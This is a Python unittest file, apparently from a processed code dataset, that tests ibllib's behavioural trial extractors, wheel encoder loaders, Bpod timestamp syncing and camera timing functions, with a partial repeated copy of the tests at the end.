np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = 